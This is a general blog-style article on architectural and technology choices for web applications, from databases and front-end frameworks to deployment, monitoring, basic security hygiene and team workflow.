Designing Web Applications-Architectural Components
What are the main considerations one needs to think of when creating a web application? Why does the architecture in your company is the way it is? What are its non trivial parts? How to think about the “other end”?
After working in 5 startups, mostly as a full stack engineer, being dev lead, CTO and tech director, and creating many side projects - I want to share my thoughts about choosing technologies to work with and how to think in a high level perspective about web applications.
What are the most high level components of web applications?
If you need to pick just 3–4 components that are the most high level ones in an app, what would it be?
You probably think of back-end, front-end, maybe the connection between them, and a DB.
When you drill down into a higher resolution of the architecture, you see much more components, and this is what I’ll review in this article. Shall we start?
Some basic principles before getting into the technical details. This is the most important part of the article, in my opinion.
Before you start choosing technologies
Time frame for development
Do you have a specific deadline? When is it? How much time do you have to work on it, and are you the only person who will work on it? Can consultants be part of the building? Or maybe rushing is not important in your case?
- Is it a startup MVP? If so, you’d like to keep hiring in mind — choose technologies that people know, so that the pool of experienced candidates is as big as possible. Choose technologies that people want to work with, so that potential candidates are excited to grow in your organization.
- Maybe it’s a side project? Then you want to keep your long term goals in mind, think about the next job you want to have or a technology at your current company that you want to master.
Knowledge in the team
If you work in a group, you’d want to examine the current knowledge of everyone. You probably don’t want to choose only technologies that no one in the group worked with before, because otherwise starting will be a big struggle.
Different products and markets have different characteristics and this might affect the choices:
- Security, regulation: maybe the product is in the domain of health, and saves users’ sensitive personal information. In this case you should pay extra attention to security from the very first user. Maybe you need to be GDPR compatible pretty soon? In that case you might want the servers in Europe.
- Mobile vs. web: if the product will contain both web and mobile versions, you might want to use React for the web front-end and React Native for the mobile. You’d want to consider working with GraphQL, because it allows smaller objects in the transactions, which is better for possible smaller bandwidth that might occur if the internet is bad. If most of the app is front-end and there’s just a thin layer of backend around the DB, you might want to use Node for the backend, to allow flexibility of the people who work on the project.
- Continuous deployment (CD) or not: It’s considered best practice to do continuous deployment (release every new working feature to production without waiting for a certain “release date”). However, some products don’t allow using it: games that has specific release date, health related products that are under regulation and need massive QA cycles, and more.
- How long will it live for: is this a short term project, a POC? Or maybe it’s just the beginning of a product that will change a lot following feedback from users? Maybe there’s one shot to create it and it will stay the way it’s been created?
- Who will maintain it: will it be you? If not, will you have time to onboard the maintainer(s)?
Is there a specific budget? Can it grow in the future or is it fixed? This might affect choices related to the clouds.
Remember: always check before using
This is the last principle to keep in mind before diving into picking technologies, and a very important one. What we know about technologies might be different from their current state. Maybe we did a thorough research half a year ago comparing databases, but a month ago, a killer feature was added to one of them. It’s not recommended to choose technologies without taking at least a few hours to see the latest updates about them. Other things change as well — a year ago I’d say that a con of choosing the front-end platform Vue.js is that the community is small, but that changed a lot during the past year.
So now we’re ready to start..
Let’s review some key decisions one needs to take to create the back-end of a web application.
- Dynamically / statically typed vs. type inference: one of the main questions we might ask ourselves is do we prefer to work with dynamically or statically typed language, and do we prefer to work with a language that infers the types. While it’s correlated, it’s not the same — dynamically typed languages will check type related errors only in run time, while statically typed languages will check it much often, in compile time. But that doesn’t mean the types will be written by the developer necessarily — that depends on the language design. If a language determine the types from the context — it supports type inference. While this is a big difference between languages and people tend to feel strongly about it — I personally think it doesn’t really matter to most projects.
- Popular: Like mentioned before, if we choose popular language, we can hire more easily because the pool of talents is bigger, and because people will be excited to work on it. There’s another important reason to choose a popular solution — the community. Can we find our questions online with answers? Are there a lot of posts explaining how to do things? Have many people tried to do complex stuff with it, which might cause necessary evolution?
- Leader / team preference: In my opinion, this will be one of the main reasons for choosing the language. If the team doesn’t like working on the code base — the motivation will drop and it’ll take longer to develop.
- It’s not forever and not sole: high chances you’d write micro services at some point. You will be able to use different languages for different micro services. And you can always migrate.
Framework / server
Serverless is a model where you don’t manage the resources of the server on which you run the back-end — you don’t watch the CPU or memory and you don’t install it. Instead — the cloud you work with does it for you.
For example, AWS Lambda allows you to write functions. You connect it to Amazon API Gateway on one side and to a DB on the other side. You don’t pay when it’s not running (no http calls), and it auto scales — when there are a lot of calls AWS manages it for you and allows the processing of all the calls. It supports Java, Go, PowerShell, Node.js, C#, Python, Ruby and other languages.
Other clouds support serverless as well, with services such Azure Functions and Google Cloud Functions.
A couple of years ago, people said about serverless that it will become stable and mature, and most companies will migrate to this model. It became a lot more stable and mature, and many companies use it for certain use cases — but I don’t know a lot of companies who use it as a complete alternative to their servers. I think it’s good for replacing micro services who have reoccurring huge peaks in load, and most of the time have a very low load. Wait — micro what?
Micro Services is a technique opposite to Monolith. Instead of having one big server — one has a lot of small servers who communicate between them using HTTP or Queues (queues are used in monoliths as well). This practice allows using different languages, and more important — different scales for different parts of the application. While I think it’s an overkill for MVP, most likely it will be better for a more mature application. So this is an example of an architectural change that is inevitable once the application grows.
Relational (SQL) or non-relational (NoSQL)
This might be our first question when examining databases. Relational databases have tables, while non-relational databases have objects, trees, key-value structure, etc. In relational databases the schema is predefined, while in non relational — more flexible. Non relational databases are better for large scale due to horizontal scalability.
But is that the right question to ask?
In my opinion, more important than these categories, is which DB is best for each use case. For example, ElasticSearch is good for texts searches. Cassandra has great features for counters, Redis has a key-value structure, MongoDB is a popular noSQL DB and good if the data changes and doesn’t have the same fields always — but might be problematic for teams with a lot of juniors or with not a lot of discipline, who might add a lot of unnecessary data to it. PostgreSQL is a popular choice to the opposite case.
Replication, or creating a cluster, is making copies of the entire DB, so that writing and reading are done from one of them to spread the load, and the nodes update each other. This helps in keeping high availability.
In sharding, huge tables are split across different nodes of the database cluster.
Separating between the database query language and the code, by adding a “translation” layer (external library), that allows replacing the database without changing the code. For example, Waterline.
The most important thing when preparing to deploy an app with users: configure a backup for the DB that runs at least once a week, make sure it works, make sure you know how to use it.
REST Vs. GraphQL
REST is a convention of designing APIs — HTTP calls with methods like POST and GET, and each one of them is in use in specific cases — POST to create a new object, with JSON object in its body. GET to fetch data from the server, and so on. GraphQL is a new way to design API, developed by Facebook. It allows fetching different parts of different objects from the server in one call, and by that make calls leaner. It’s good especially for mobile apps that might be limited by internet bandwidth.
HTTP vs. WebSockets
Web Sockets are the server’s “push notifications”. It’s good to use them in case the server needs to announce the client with new information, for example emails that are received from other users. Instead of polling the server every x seconds, the server can communicate immediately that new data is available, and also send it. Although web sockets are great and usually needed, I think that implementing them from the beginning is an over engineering. It’s one of these things we know we’ll need to add later, but still postpone to a more mature stage of the project.
Front End Decisions
MVC vs. SPA vs. SSR apps
- Model View Controller model was the popular front end architecture ten years ago. In this architecture, the server sends HTML pages to the browser, with the relevant data inside them. The pages are created in the server using template engines.
- Single Page Application is the most popular way to create front end applications today. The front end code is downloaded completely to the browser, many times from a different cloud than the server, and it communicates with the server in JSON objects only, updating and fetching data, and not HTML files. This way, the front end can have a state that is kept throughout the use of the app, and is not reloaded every time the server sends a new HTML page (see the state section next for elaboration).
- SSR (server side rendering), or universal/Isomorphic apps: it’s a mix between SPA and servers that serve the HTML pages. It’s good in case you have to load the first page really quick, or you need advanced SEO. But these are usually needed for marketing websites, that you don’t want to create as SPA applications anyways (in most cases), but as a Wix or Word Press website.
- React Vs. Angular Vs. Vue Vs. Web Components: all of these four are modern ways to create front end applications. “The front end wars” have been going on for years now, with people trying to decide to which platform to migrate. Vue was heavily used in the east, so a few years ago I wouldn’t recommend using it, cause of small western community. But in the past couple of years this has changed. I love the documentation of React, as well as its diverse approach to developer teams and the eco system. Angular is supposed to be better fix for large organisations, but I don’t have personal experience with it. And Web Components are way to create front-end app which is platform agnostic, and is (supposed) to stay here forever, even when other platforms will stop being supported.
- State management: front-end components need to share information between one another, and it’s saved in a global state. This state is hard to manage, and there are a few great solutions for it today. The most common one is Redux, which became unnecessary for React apps in many cases with the publishing of the new hooks API. An alternatives are MobX, and Apollo, a GraphQL library. Global vars can be saved also in session storage / local storage, but that’s recommended for very specific usages as you can read here.
- UI components — Bootstrap / Semantic UI / Material design / Ant design: it’s not recommended to create the entire graphics of the app from scratch, even if it’s a big company. Relay on one of these libraries and modify it. To choose between them, consult with a designer! You want to choose the library that is most similar to the design you need. Also check how flexible it is to modifications, cause some of them aren’t.
Deployment of SPA
Here are some of the options available for deploying SPA applications:
- S3: a storage service of AWS that behaves like folders, and can be configured to a domain, so that browsing to that domain will download the front-end code and run it.
- Netlify: my personal favourite, a cloud for deployment of static apps, allows auto deploy from different branches to auto generated domain names, saves history, comfortable pricing model.
- GitHub pages: another popular alternative.
Here are a few considerations when choosing which cloud to use. Keep in mind it’s not forever. You can always migrate. There’s a cost to migration, but there’s also a cost to postponing a decision.
Check the pricing model and notice issues like — does the free tier contains restarts that you can’t afford, and by that preventing you from using it?
Is it popular among companies who do similar things to what you do? What kinds of solutions is it built for / excelling at?
Does it have a clear documentation?
Is it easy to control security aspects in it?
Server location / Regulation
Does it have physical servers in Europe? You might be limited to that by GDPR. Maybe all your clients are in Asia, and you want to have the servers there and not in America, so that the response time is quicker. To do that you can also use servers in America and use a CDN service.
Can use more than one!
You don’t have to work with just one cloud, you can use multiple clouds if it creates the best solution for you.
While in AWS you have to configure a load balancer if you have more than one server node, Heroku allows you to have multiple nodes without configuring a load balancer. Notice configuration differences between the clouds.
How important is it that your local environment will be similar to the cloud environment? This, together with the complexity of spinning up a new local environment and a need to have a few different environments on the same computer, will determine if you should use Docker from the beginning of the project.
How to deploy
When the project is bigger with more people, it’s good to use some deployment tool like Ansible to manage the different steps of the process. But at the beginning of a project you usually don’t need it.
You have the production environment, and you have your local development environment. You can have a few more environments: staging, which is configured exactly like production and exist for load tests and / or sanity. Ad hoc environment for git branches to test features out side of developers local environment. Demo environment for demoing specific features with specific configurations.
Build & Test platform
I think it’s better to configure a CI/CD platform with infra for tests and a few basic tests pretty close to the beginning of the project. Three main platform for CI/CD are Jenkins, Travis, and CircleCI. Jenkins has been there for over 10 years, while Travis and CircleCI are more modern.
Logs / Monitoring Decisions
Logs, like a certain amount of unit tests, are important almost from the very beginning, in my opinion. They will help you to debug production if there’s un expected need, and to gather some basic statistics.
I like to separate the front end logs from the server logs, so certain parts of the server aren’t working, some front-end logs might still be sent to the external system that I use to collect them. But at the beginning it’s also okay to send the front end logs through the server, to the same place.
When should you get an email? When should you get a phone call?
These are the most important security issues to take into consideration when creating a new web project:
Prevent XSS attacks
Cross Site Scripting — injection of malicious code through the front end. Here’s a cheatsheet with great explanations about it, and a fantastic summary from this link. Untrusted data is for example data coming directly from an input field without escaping it.
On Node server, don’t use strict mode for security — use Eslint with the security plugin to help you make sure you don’t expose this vulnerability by mistake.
Prevent DoS attacks
Denial of Service attacks happen when a lot of clients are trying to approach your APIs together and killing your servers. Use can configure rate limiting to prevent that. Read more here.
Don’t save raw passwords in the DB
Save hash of the passwords of the users, if you manage the passwords on your own. A hash is a mathematical function that you run on the password, and is (almost) impossible to find the password from the return value. But running the hash function on the same password will always give the same value, so you can compare the passwords users are entering with the hashes you saved for them when they first signed up.
Don’t save keys in the code
If you save a configuration file with keys, the only way to remove it from the codebase is to delete the commit and force push master (if there aren’t other branches with the problematic commit). Force pushing to master is a practice people tend to avoid at all cost, and it’s not always possible to remove just one problematic commit. So don’t save keys in the code, save them in environment variables or config file that you exclude using .gitignore file.
Use unique, hard passwords for prod with 2fa
The easiest way is to have the team use 1password, Lastpass, or similar.
How will the team work?
Here’s a post I wrote about Git Flow. TL;DR: most likely you’d want to have master branch, protect it from merges so that only approved PRs that pass the unit tests can be merged. Every person works on their own branch called ‘feature/my-feature’, they rebase on master and then merge to it when it’s ready. Others can only comment, they can’t commit to someone else’s branch without coordinating. There’s no one right way to choose a git flow, it’s depending on the product’s nature.
Depending on the technologies you use, sooner or later you’ll have to update the libraries you use. I also mentioned it in my Git Flow post (at the end).
Sprint planning / tasks management
What tool are you going to use for your task management? What is the length of a sprint? Does it have a pre defined length? I find it comfortable to try to create sprints of 1–2 weeks, and inside them create tasks of about two days. They tend to average themselves and if we need to coordinate the deadline with a client I buffer it so that there’s an internal deadline and external deadline. The most important thing with time estimations, which are always guesses, is transparency and raising flags in time.
Use the README, and you also want to use Drive or Quip or any other platform for documents and try to keep it organised from the beginning, and encourage everyone to use it a lot, also by giving a self example.
You probably want to create a Slack workspace and Gmail account. On Slack create channel for each conversation context, so that it’s easy to search and scroll.
Don’t forget to choose and buy a domain, there are a lot of companies you can do this through.
You might want to use an external service to manage your users, like Auth0.
The one crucial mistake I’ve seen people do it this: over engineering. Keep it simple, don’t over kill it. Start small and grow the architecture with the business. But notice quality aspects like tests and processes from the beginning. Skip: Analytics, regulation, cache, queues, demo env, Kubernetes, Docker. Balance the research — don’t build POCs for months. Most times it’s better just to release something and then iterate over it.
How to become familiar with these stuff
If you want to feel comfortable with all the knowledge mentioned here — it’s possible, and even easy!
Do side projects
Go to a hackathon, or sit down 2–3 hours every week, and create a small app end-to-end.
Work at different, innovative companies
Seeing different companies helps in developing a feel about the right practices, methodologies and technologies.
Be a CTO at a startup
You don’t need to have 20 years of experience to be a CTO of a startup. How old was your CTO when he started his first role as a CTO?
Ask a friend
I’m in many groups of VP R&D and CTOs, and what I read there is what all the consultants that I’ve ever worked with told me: people ask each other. All the time. What is the recommended technology to solve these type of problems, what are other opinions on specific solutions, etc. No one works alone, although sometimes it looks like it. Good software is a collaboration artefact.
Thanks for reading this article! Feel free to leave a comment below.